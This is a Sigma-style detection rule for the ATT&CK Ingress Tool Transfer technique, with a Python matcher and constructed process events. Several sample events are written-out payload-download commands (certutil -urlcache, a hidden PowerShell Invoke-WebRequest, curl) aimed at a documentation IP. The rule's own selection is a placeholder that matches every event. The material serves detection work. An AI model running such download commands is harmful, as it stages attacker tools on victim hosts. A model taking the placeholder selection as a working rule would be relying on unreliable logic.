title: Ingress Tool Transfer (T1105)
id: df00tech-t1105
status: experimental
description: "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools may be pulled via the C2 channel or through alternate protocols using built-in OS utilities (certutil, bitsadmin, PowerShell Invoke-WebRequest, curl, wget, scp). Threat actors including HAFNIUM, Fox Kitten, and Cobalt Group have leveraged this technique to stage second-stage payloads, implants, and post-exploitation toolkits onto victim systems."
references:
  - https://attack.mitre.org/techniques/T1105/
  - https://df00tech.com/detections/T1105
author: df00tech
date: 2026/04/17
tags:
  - attack.t1105
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Software deployment tools (SCCM, Intune, Chocolatey, winget) using certutil or bitsadmin to stage installers into Temp directories"
  - "IT administrators using certutil -urlcache or Invoke-WebRequest for legitimate patch management or inventory scripts"
  - "Developer toolchains (npm, pip, gradle) spawning curl or wget to download build dependencies to temp locations"
  - "Monitoring and backup agents (CrowdStrike, SolarWinds, Veeam) that periodically download update packages using BitsTransfer"
  - "Security scanning tools that use built-in download utilities for OSINT enrichment or threat intel feed ingestion"
level: high
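The detection block above is a placeholder, so as an added example (not part of the df00tech rule or its KQL/SPL query) the following Python applies the command-line patterns for the utilities the description names (certutil -urlcache, bitsadmin, Invoke-WebRequest/Start-BitsTransfer, curl/wget, scp) to constructed process_creation events, and suppresses children of the SCCM client as the falsepositives list suggests. The CcmExec.exe allowlist entry, the regular expressions and the sample events are assumptions, not content from the rule.

```python
import re

# Parent processes of approved deployment tooling that are tuned out (assumed: the SCCM client).
ALLOWED_PARENTS = {"ccmexec.exe"}

# Per-utility patterns for the download tools the rule description names.
# Each entry: (rule name, image basename regex, command-line regex).
RULES = [
    ("certutil_download", r"certutil\.exe$", r"(?i)-urlcache\b.*https?://"),
    ("bitsadmin_download", r"bitsadmin\.exe$", r"(?i)/(transfer|addfile)\b.*https?://"),
    ("powershell_download", r"(powershell|pwsh)\.exe$",
     r"(?i)(invoke-webrequest|\biwr\b|start-bitstransfer).*https?://"),
    ("curl_wget_download", r"(curl|wget)\.exe$", r"(?i)https?://"),
    ("scp_transfer", r"scp\.exe$", r"\S+@\S+:"),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the matching rule name for one process_creation event, or None.
    Children of an allowlisted deployment agent are suppressed before matching."""
    if basename(event.get("ParentImage", "")) in ALLOWED_PARENTS:
        return None
    image, cmd = basename(event.get("Image", "")), event.get("CommandLine", "")
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, image) and re.search(cmd_re, cmd):
            return name
    return None

def detect(events):
    """Return (rule name, CommandLine) for every event that matches a rule."""
    hits = [(classify(ev), ev["CommandLine"]) for ev in events]
    return [(name, cmd) for name, cmd in hits if name]

# Constructed sample events (not real telemetry); 198.51.100.7 is a documentation-range address.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -urlcache -split -f http://198.51.100.7/s2.exe C:\Users\Public\s2.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -nop -w hidden Invoke-WebRequest http://198.51.100.7/x.ps1 -OutFile C:\Temp\x.ps1"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "CommandLine": r"certutil -urlcache -split -f http://updates.corp.example/inst.msi C:\Windows\Temp\inst.msi"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -hashfile C:\Temp\file.exe SHA256"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl -o C:\Users\Public\t.bin http://198.51.100.7/t.bin"},
]
```

Running `detect(SAMPLE_EVENTS)` flags the first, second and fifth events; the SCCM-parented certutil download and the benign `-hashfile` invocation produce no hit.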
